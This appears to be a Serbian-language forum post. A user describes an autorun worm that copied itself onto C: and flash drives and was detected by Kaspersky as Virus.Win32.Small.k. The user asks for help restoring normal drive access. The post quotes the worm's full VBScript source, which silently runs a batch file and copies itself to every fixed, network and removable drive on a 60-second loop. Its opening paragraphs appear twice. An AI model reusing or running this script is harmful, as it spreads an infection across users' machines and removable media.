Provalio sam da mi komp na potuno prazan flash disk bez mog odobrenja prakopira fajlove pod nazivom autorun.bat, bin, inf, reg, vbs, txt, wsh. A verovatno su sa nekog fles diska stigli na moj komp i uvalili se na c: root.
Interesantno AVG sa poslednjom definicijom ih ne prepoznaje kao viruse. Ali zato kasperski kaze:
detected: virus Virus.Win32.Small.k
File: C:\autorun.vbs
Problem je u tome, sto kada izbrisem ove fajlove kao sto kasperski predlozi, ne mogu uci u c: iz my computera, kaze error: missing windows scripting host ili tako nesto. Mogu uci u c: iz win explorera ili total commandera, ali ovo ipak nervira. Pa se pitam da ne postoji uvek taj autorun.nesto u rootu koji omogucava normalan rad, ako ga imate uploadujte, da ne instaliram ceo Xp za dzaba, hvala. Voleo bih da cujem ako znate nesto o ovom virusu.
Inace ovo je sadrzaj tog autorun.vbs, ne deluje strasno, ali je ostali su jos manji velicine par stotina bajtova:
Interesantno AVG sa poslednjom definicijom ih ne prepoznaje kao viruse. Ali zato kasperski kaze:
detected: virus Virus.Win32.Small.k
File: C:\autorun.vbs
Problem je u tome, sto kada izbrisem ove fajlove kao sto kasperski predlozi, ne mogu uci u c: iz my computera, kaze error: missing windows scripting host ili tako nesto. Mogu uci u c: iz win explorera ili total commandera, ali ovo ipak nervira. Pa se pitam da ne postoji uvek taj autorun.nesto u rootu koji omogucava normalan rad, ako ga imate uploadujte, da ne instaliram ceo Xp za dzaba, hvala. Voleo bih da cujem ako znate nesto o ovom virusu.
Inace ovo je sadrzaj tog autorun.vbs, ne deluje strasno, ali je ostali su jos manji velicine par stotina bajtova:
Kod:
rem autorun·ç±©
on error resume next
Set WshShell =CreateObject("WScript.Shell")
if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then
a=WshShell.Run("autorun.bat Over" ,0,True)
Set Of = CreateObject("Scripting.FileSystemObject")
Set fc = Of.OpenTextFile("C:\autorun.txt", 1)
mt = fc.ReadAll
fc.Close
if mt<>"" then msgbox decrypt(mt)
end if
if Year(Date)>2030 or Month(Date)>100 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.*",d&"\",True
else
Of.CopyFile "autorun.*",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.*",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
function decrypt(dcode)
dim texts
dim i
for i=1 to len(dcode)-4
x=i mod 5
texts=texts & chr(asc(mid(dcode,i,1))-x)
next
decrypt=texts
end function
